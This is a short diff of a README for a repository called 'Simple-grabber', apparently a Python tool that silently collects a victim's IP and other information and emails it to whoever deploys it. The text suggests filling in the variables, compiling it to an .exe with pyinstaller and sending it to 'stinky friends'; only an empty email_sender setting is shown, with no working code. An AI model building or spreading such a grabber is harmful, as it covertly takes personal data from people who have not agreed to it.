AwoDako/Simple-grabber/README.md

 # Simple-grabber
 Simple IP grabber thet can silently get informations and send it on your email .
-If you want you can fill the variables and export this fil to .exe with pyinstaller and send tis exe to your stinky friends.
-HeHe
+If you want you can fill the variables and export this fil to .exe with pyinstaller and send tis exe to your stinky friends hehe.

 email_sender = ''